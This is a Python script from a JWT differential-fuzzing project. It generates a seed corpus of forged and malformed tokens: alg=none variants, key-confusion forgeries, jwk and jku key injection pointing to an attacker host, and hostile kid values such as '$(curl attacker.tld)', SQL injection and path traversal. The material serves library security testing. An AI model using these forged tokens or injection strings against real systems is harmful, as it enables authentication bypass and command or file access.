Zion Boggan
repos/JWT Differential Fuzzer/scripts/build_corpus.py
zionboggan.com ↗
368 lines · python
History for this file →
1
"""Build corpus/seed.json. Programmatic, dense, multi-class.
2
 
3
Output classes are tagged so triage groups disagreements by bug-family.
4
Severity tags:
5
  bypass-risk : token should be REJECTED. If any lib accepts, that's an auth-bypass.
6
  dos-risk    : token should be ACCEPTED. If any lib rejects, that's a denial of validation.
7
  parser-quirk: tolerated divergence; surfaces lib personality.
8
"""
9
import base64
10
import hashlib
11
import hmac
12
import json
13
import os
14
import struct
15
from pathlib import Path
16
 
17
import jwt as pyjwt
18
from cryptography.hazmat.primitives import serialization
19
from cryptography.hazmat.primitives.asymmetric import rsa, ec, ed25519
20
 
21
def b64u(b: bytes) -> str:
    """Return *b* as URL-safe base64 text with the trailing ``=`` padding removed."""
    encoded = base64.urlsafe_b64encode(b).decode()
    return encoded.rstrip("=")
23
 
24
def b64u_json(o) -> str:
    """Serialise *o* as compact JSON (no spaces after separators) and base64url-encode it."""
    compact = json.dumps(o, separators=(",", ":"))
    return b64u(compact.encode())
26
 
27
def gen_keys():
    """Generate the key material used to build the corpus.

    Returns:
        A 5-tuple ``(rsa_priv, rsa_pub, ec_priv, ec_pub, hmac_secret)``.
        The first four are PEM strings (PKCS8 private keys,
        SubjectPublicKeyInfo public keys) for a fresh 2048-bit RSA key and
        a fresh P-256 EC key; the last is a fixed shared-secret string.
    """

    def pem_pair(private_key):
        # Serialise one private key and its public half as PEM text.
        private_pem = private_key.private_bytes(
            serialization.Encoding.PEM,
            serialization.PrivateFormat.PKCS8,
            serialization.NoEncryption(),
        )
        public_pem = private_key.public_key().public_bytes(
            serialization.Encoding.PEM,
            serialization.PublicFormat.SubjectPublicKeyInfo,
        )
        return private_pem.decode(), public_pem.decode()

    rsa_priv, rsa_pub = pem_pair(
        rsa.generate_private_key(public_exponent=65537, key_size=2048)
    )
    ec_priv, ec_pub = pem_pair(ec.generate_private_key(ec.SECP256R1()))

    return rsa_priv, rsa_pub, ec_priv, ec_pub, "schism-secret"
51
 
52
# Baseline claim set reused by the generated tokens: a fixed subject and
# issued-at timestamp, plus a far-future expiry.
CLAIMS = {"sub": "alice", "iat": 1_700_000_000, "exp": 9_999_999_999}
53
 
54
def hs256_sign(secret_bytes: bytes, header: dict, claims: dict) -> str:
    """Build a compact ``header.payload.signature`` token signed with HMAC-SHA256.

    Args:
        secret_bytes: HMAC key.
        header: header object, serialised as compact JSON.
        claims: payload object, serialised as compact JSON.

    Returns:
        The three base64url segments joined by dots.
    """
    signing_input = ".".join((b64u_json(header), b64u_json(claims)))
    mac = hmac.new(secret_bytes, signing_input.encode(), hashlib.sha256)
    return signing_input + "." + b64u(mac.digest())
59
 
60
def cases():
    """Build the full list of seed cases for the differential fuzzer.

    Every case is a dict with the keys ``id``, ``class``, ``severity``,
    ``token``, ``key``, ``algs``, ``expected_unanimous`` and ``notes``.
    Key material comes from ``gen_keys()`` on each call, so tokens that
    depend on the RSA/EC keys differ between runs. Case ids are derived
    only from static strings (SHA-1 prefixes, never the per-process salted
    built-in ``hash``), so they are stable across runs.

    Returns:
        list[dict]: the cases, in generation order.
    """
    rsa_priv, rsa_pub, ec_priv, ec_pub, hmac_key = gen_keys()
    hmac_secret = hmac_key.encode()
    # CLAIMS is never mutated here, so the encoded payload is computed once.
    claims_b64 = b64u_json(CLAIMS)
    out = []

    def add(id_, cls, sev, token, key, algs, expected, notes=""):
        # Append one case record to the corpus.
        out.append({
            "id": id_, "class": cls, "severity": sev,
            "token": token, "key": key, "algs": algs,
            "expected_unanimous": expected, "notes": notes,
        })

    def short_hash(text):
        # Deterministic 8-hex-digit suffix used to keep ids unique.
        return hashlib.sha1(text.encode()).hexdigest()[:8]

    def hs_token(secret, header_b64, digestmod=hashlib.sha256):
        # HMAC-sign "<header>.<claims>" and return the complete token.
        signing_input = f"{header_b64}.{claims_b64}"
        mac = hmac.new(secret, signing_input.encode(), digestmod).digest()
        return f"{signing_input}.{b64u(mac)}"

    # --- baseline controls -------------------------------------------------
    add("base-rs256", "baseline", "control",
        pyjwt.encode(CLAIMS, rsa_priv, algorithm="RS256"),
        rsa_pub, ["RS256"], "accept", "happy path RS256")
    add("base-hs256", "baseline", "control",
        pyjwt.encode(CLAIMS, hmac_key, algorithm="HS256"),
        hmac_key, ["HS256"], "accept", "happy path HS256")
    add("base-es256", "baseline", "control",
        pyjwt.encode(CLAIMS, ec_priv, algorithm="ES256"),
        ec_pub, ["ES256"], "accept", "happy path ES256")

    # --- alg=none spellings ------------------------------------------------
    none_variants = [
        ("none", "alg=none lower"),
        ("None", "alg=None title"),
        ("NONE", "alg=NONE upper"),
        ("nOnE", "alg=nOnE mixed"),
        ("none\x00", "alg=none\\x00 trailing null"),
        (" none", "alg= none leading space"),
        ("none ", "alg=none trailing space"),
    ]
    for v, note in none_variants:
        h = b64u_json({"alg": v, "typ": "JWT"})
        add(f"none-{v.strip().lower() or 'empty'}-{short_hash(v)}",
            "none-alg", "bypass-risk",
            f"{h}.{claims_b64}.", "", ["RS256"], "reject", note)

    # The escaped spelling has to be written as raw JSON: going through
    # json.dumps would emit a plain "none" and duplicate the first variant.
    escaped_none_hdr = b64u(b'{"alg":"\\u006eone","typ":"JWT"}')
    add("none-unicode-escape", "none-alg", "bypass-risk",
        f"{escaped_none_hdr}.{claims_b64}.", "", ["RS256"], "reject",
        "alg=none unicode escape")

    none_hdr = b64u_json({"alg": "none", "typ": "JWT"})
    add("none-with-junk-sig", "none-alg", "bypass-risk",
        f"{none_hdr}.{claims_b64}.{b64u(b'whatever')}", "", ["RS256"], "reject",
        "alg=none with non-empty signature segment")

    # --- algorithm confusion: public key reused as HMAC secret -------------
    hmac_digests = {
        "HS256": hashlib.sha256,
        "HS384": hashlib.sha384,
        "HS512": hashlib.sha512,
    }
    for alg, digestmod in hmac_digests.items():
        h = b64u_json({"alg": alg, "typ": "JWT"})
        add(f"alg-conf-rsa-as-{alg.lower()}", "alg-confusion", "bypass-risk",
            hs_token(rsa_pub.encode(), h, digestmod),
            rsa_pub, ["RS256", alg], "reject",
            f"forge {alg} using RSA pubkey PEM as HMAC secret; allowlist includes both")

    hs256_hdr = b64u_json({"alg": "HS256", "typ": "JWT"})

    add("alg-conf-ec-as-hs256", "alg-confusion", "bypass-risk",
        hs_token(ec_pub.encode(), hs256_hdr), ec_pub, ["ES256", "HS256"], "reject",
        "forge HS256 using EC pubkey PEM as HMAC secret")

    add("alg-conf-strict-allowlist", "alg-confusion", "bypass-risk",
        hs_token(rsa_pub.encode(), hs256_hdr), rsa_pub, ["RS256"], "reject",
        "token claims HS256 but allowlist=[RS256] - must reject from allowlist alone")

    # Same public key, but as standard-base64 DER text without PEM armour.
    rsa_pub_der = base64.b64encode(
        serialization.load_pem_public_key(rsa_pub.encode()).public_bytes(
            serialization.Encoding.DER,
            serialization.PublicFormat.SubjectPublicKeyInfo,
        )
    ).decode()
    add("alg-conf-rsa-der-as-hs256", "alg-confusion", "bypass-risk",
        hs_token(rsa_pub_der.encode(), hs256_hdr),
        rsa_pub_der, ["RS256", "HS256"], "reject",
        "RSA pubkey DER (no PEM headers) as HMAC secret - bypasses PEM-detection guards")

    # --- crit header handling ----------------------------------------------
    crit_cases = [
        ({"alg": "HS256", "typ": "JWT", "crit": ["foobar"], "foobar": True},
         "crit references unknown ext"),
        ({"alg": "HS256", "typ": "JWT", "crit": ["b64"], "b64": False},
         "crit=b64=false (RFC 7797 detached payload)"),
        ({"alg": "HS256", "typ": "JWT", "crit": []},
         "crit empty array - strict reading rejects"),
        ({"alg": "HS256", "typ": "JWT", "crit": "foobar", "foobar": True},
         "crit as scalar string instead of array"),
        ({"alg": "HS256", "typ": "JWT", "crit": ["alg"]},
         "crit names reserved 'alg' - RFC 7515 4.1.11 forbids reserved names"),
    ]
    for hdr, note in crit_cases:
        slug = note.split()[0].lower().replace("=", "-").replace("/", "-")
        add(f"crit-{slug}-{short_hash(note)}",
            "crit-header", "bypass-risk",
            hs_token(hmac_secret, b64u_json(hdr)), hmac_key, ["HS256"], "reject", note)

    # --- key injection through header parameters ---------------------------
    attacker_secret = "attacker-symmetric-key"
    h = b64u_json({"alg": "HS256", "typ": "JWT",
                   "jwk": {"kty": "oct", "k": b64u(attacker_secret.encode())}})
    add("jwk-embed-oct-self-sign", "key-injection", "bypass-risk",
        hs_token(attacker_secret.encode(), h), hmac_key, ["HS256"], "reject",
        "header.jwk embeds attacker oct key, sig validates against THAT key")

    bogus_rsa_sig = b64u(b"x" * 256)

    h = b64u_json({"alg": "RS256", "typ": "JWT",
                   "jwk": {"kty": "RSA", "n": b64u(b"x" * 256), "e": "AQAB"}})
    add("jwk-embed-rsa-bogus-sig", "key-injection", "bypass-risk",
        f"{h}.{claims_b64}.{bogus_rsa_sig}", rsa_pub, ["RS256"], "reject",
        "header.jwk RSA + invalid sig; lib must use configured key, not jwk header")

    h = b64u_json({"alg": "RS256", "typ": "JWT", "jku": "https://attacker.example/jwks.json"})
    add("jku-attacker-url", "key-injection", "bypass-risk",
        f"{h}.{claims_b64}.{bogus_rsa_sig}", rsa_pub, ["RS256"], "reject",
        "header.jku to attacker domain. Lib must not fetch; sig is invalid anyway.")

    # --- hostile kid values ------------------------------------------------
    kids = [
        "../../../../dev/null",
        "'; DROP TABLE keys;--",
        "$(curl attacker.tld)",
        "key1\nkey2",
        "\\\\attacker\\share\\key.pem",
        "{\"$ne\": null}",
        "../../etc/passwd",
        "\U0001F511",  # key emoji, escaped so the source stays ASCII-safe
    ]
    bogus_hs_sig = b64u(b"x" * 32)
    for k in kids:
        h = b64u_json({"alg": "HS256", "typ": "JWT", "kid": k})
        add("kid-" + short_hash(k), "kid-injection", "parser-quirk",
            f"{h}.{claims_b64}.{bogus_hs_sig}", hmac_key, ["HS256"], "reject",
            f"kid={k!r} - sig bogus, value is whether lib surfaces oddly")

    # --- signature segment mutations on a valid HS256 token ----------------
    good_hs = pyjwt.encode(CLAIMS, hmac_key, algorithm="HS256")
    h_part, p_part, sig_part = good_hs.split(".")
    sig_mutations = [
        ("empty", ""),
        ("zero32", b64u(b"\x00" * 32)),
        ("ones32", b64u(b"\xff" * 32)),
        ("truncated", sig_part[:20]),
        ("doubled", sig_part + sig_part),
        ("ascii", b64u(b"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA")),
        ("padded", sig_part + "===="),
        ("urlsafe-vs-std", sig_part.replace("-", "+").replace("_", "/")),
    ]
    for name, mut in sig_mutations:
        add(f"sig-{name}", "sig-mutation", "bypass-risk",
            f"{h_part}.{p_part}.{mut}", hmac_key, ["HS256"], "reject",
            f"sig mutation: {name}")

    # --- ECDSA signature encodings -----------------------------------------
    good_es = pyjwt.encode(CLAIMS, ec_priv, algorithm="ES256")
    h_es, p_es, sig_es = good_es.split(".")
    # Surplus "=" padding lets the decoder accept the unpadded segment.
    raw_sig = base64.urlsafe_b64decode(sig_es + "===")
    zero64 = b"\x00" * 64
    leading0 = b"\x00" + raw_sig
    s_zero = raw_sig[:32] + b"\x00" * 32
    add("ecdsa-zero-rs", "ecdsa-encoding", "bypass-risk",
        f"{h_es}.{p_es}.{b64u(zero64)}", ec_pub, ["ES256"], "reject",
        "ES256 with r=0, s=0 - must reject")
    add("ecdsa-65byte", "ecdsa-encoding", "bypass-risk",
        f"{h_es}.{p_es}.{b64u(leading0)}", ec_pub, ["ES256"], "reject",
        "ES256 with extra leading zero byte (65 bytes total)")
    add("ecdsa-s-zero", "ecdsa-encoding", "bypass-risk",
        f"{h_es}.{p_es}.{b64u(s_zero)}", ec_pub, ["ES256"], "reject",
        "ES256 with valid r and s=0")

    # --- claim typing ------------------------------------------------------
    type_claims = [
        ({**CLAIMS, "exp": "9999999999"}, "exp as string", "accept"),
        ({**CLAIMS, "exp": True}, "exp as bool true", "accept"),
        ({**CLAIMS, "exp": [9_999_999_999]}, "exp as 1-elem array", "accept"),
        ({**CLAIMS, "exp": None}, "exp as null", "accept"),
        ({**CLAIMS, "exp": -1}, "exp negative -1", "reject"),
        ({**CLAIMS, "exp": 0}, "exp zero", "reject"),
        ({**CLAIMS, "exp": 9_999_999_999.5}, "exp float well-future", "accept"),
        ({**CLAIMS, "iat": "1700000000"}, "iat as string", "accept"),
        ({**CLAIMS, "nbf": 9_999_999_999}, "nbf far future", "reject"),
        ({**CLAIMS, "sub": 12345}, "sub as int", "accept"),
    ]
    for cl, note, exp in type_claims:
        token = pyjwt.encode(cl, rsa_priv, algorithm="RS256")
        add("claim-" + short_hash(note), "claim-typing",
            "dos-risk" if exp == "accept" else "bypass-risk",
            token, rsa_pub, ["RS256"], exp, note)

    # --- header parsing quirks ---------------------------------------------
    # Each duplicate-key header is signed over ITS OWN bytes; otherwise the
    # signature could never verify and parser behaviour would stay hidden.
    # NOTE(review): the first case is tagged bypass-risk yet expects
    # "accept", unlike the other bypass-risk cases - confirm the intended tag.
    dup_none_first = b64u(b'{"alg":"none","alg":"HS256","typ":"JWT"}')
    add("hdr-dup-alg-keys-with-valid-hs256-sig", "header-quirk", "bypass-risk",
        hs_token(hmac_secret, dup_none_first), hmac_key, ["HS256"], "accept",
        "dup alg keys; if last-wins (HS256), sig is valid; if first-wins (none), sig is bogus")

    dup_none_last = b64u(b'{"alg":"HS256","alg":"none","typ":"JWT"}')
    add("hdr-dup-alg-none-last", "header-quirk", "bypass-risk",
        hs_token(hmac_secret, dup_none_last), hmac_key, ["HS256"], "reject",
        "dup alg keys, none last; first-wins lib accepts (sig good for HS256)")

    malformed_headers = [
        ("hdr-json-comment", b64u(b'{/*x*/"alg":"HS256","typ":"JWT"}'),
         "parser-quirk", "header JSON contains a /* */ comment"),
        ("hdr-json-trailing-comma", b64u(b'{"alg":"HS256","typ":"JWT",}'),
         "parser-quirk", "trailing comma in header JSON - strict reject, lenient accept"),
        ("hdr-utf8-bom", b64u(b"\xef\xbb\xbf" + b'{"alg":"HS256","typ":"JWT"}'),
         "parser-quirk", "UTF-8 BOM at start of header JSON"),
        ("hdr-alg-as-int", b64u_json({"alg": 256, "typ": "JWT"}),
         "bypass-risk", "alg=256 (int) - must reject (must be StringOrURI)"),
        ("hdr-alg-as-array", b64u_json({"alg": ["HS256"], "typ": "JWT"}),
         "bypass-risk", "alg=['HS256'] - must reject"),
    ]
    for case_id, header_b64, sev, note in malformed_headers:
        add(case_id, "header-quirk", sev,
            hs_token(hmac_secret, header_b64), hmac_key, ["HS256"], "reject", note)

    # --- compact-serialisation format edge cases ---------------------------
    # HS256 signing is deterministic, so the valid token built above is reused.
    good = good_hs
    format_cases = [
        ("fmt-trailing-dot", good + ".",
         "trailing dot - fourth empty segment"),
        ("fmt-five-segments", good + ".extra.junk",
         "5-dot-separated segments (JWE-shape masquerade)"),
        ("fmt-leading-ws", " " + good,
         "leading whitespace before token"),
        ("fmt-trailing-ws", good + " ",
         "trailing whitespace after token"),
        ("fmt-double-slash", good + "//",
         "trailing // - base64 padding chars"),
        ("fmt-extra-padding", f"{h_part}=.{p_part}=.{sig_part}=",
         "explicit base64 padding on each segment"),
    ]
    for case_id, token, note in format_cases:
        add(case_id, "format", "parser-quirk",
            token, hmac_key, ["HS256"], "reject", note)

    # --- allowlist edge cases ----------------------------------------------
    add("allow-empty", "allowlist-edge", "bypass-risk",
        good, hmac_key, [], "reject", "empty allowlist - must reject")
    add("allow-mismatch", "allowlist-edge", "bypass-risk",
        good, hmac_key, ["RS256"], "reject",
        "token alg=HS256 but allowlist=[RS256]")
    add("allow-superset", "allowlist-edge", "control",
        good, hmac_key, ["HS256", "RS256", "ES256"], "accept",
        "broad allowlist that includes token alg")

    # --- b64=false detached payload ----------------------------------------
    payload_raw = json.dumps(CLAIMS, separators=(",", ":")).encode()

    def detached_token(header):
        # Sign "<header>.<raw payload>" and emit the token with an empty
        # payload segment; the signature always matches the header used.
        header_b64 = b64u_json(header)
        mac = hmac.new(hmac_secret, header_b64.encode() + b"." + payload_raw,
                       hashlib.sha256).digest()
        return f"{header_b64}..{b64u(mac)}"

    add("b64-false-detached", "b64-detached", "bypass-risk",
        detached_token({"alg": "HS256", "b64": False, "crit": ["b64"]}),
        hmac_key, ["HS256"], "reject",
        "RFC 7797 detached payload - most libs don't support; must reject")

    add("b64-false-no-crit", "b64-detached", "bypass-risk",
        detached_token({"alg": "HS256", "b64": False}),
        hmac_key, ["HS256"], "reject",
        "b64=false without crit - spec violation, must reject")

    return out
350
 
351
def main():
    """Generate the corpus, write it to ``corpus/seed.json`` and print tallies.

    The path is relative to the current working directory. The ``corpus``
    directory is created if missing, so a fresh checkout does not fail with
    ``FileNotFoundError``. After writing, the number of cases per class and
    per severity is printed.
    """
    cs = cases()
    out_path = Path("corpus/seed.json")
    out_path.parent.mkdir(parents=True, exist_ok=True)
    out_path.write_text(json.dumps(cs, indent=2), encoding="utf-8")
    print(f"wrote {len(cs)} cases -> corpus/seed.json")

    # One pass per tag: count the cases, then print the counts sorted by tag.
    for field in ("class", "severity"):
        tally = {}
        for c in cs:
            tally[c[field]] = tally.get(c[field], 0) + 1
        print(f"by {field}:")
        for k, v in sorted(tally.items()):
            print(f"  {k:20s} {v}")
366
 
367
# Run the corpus build only when this file is executed as a script.
if __name__ == "__main__":
    main()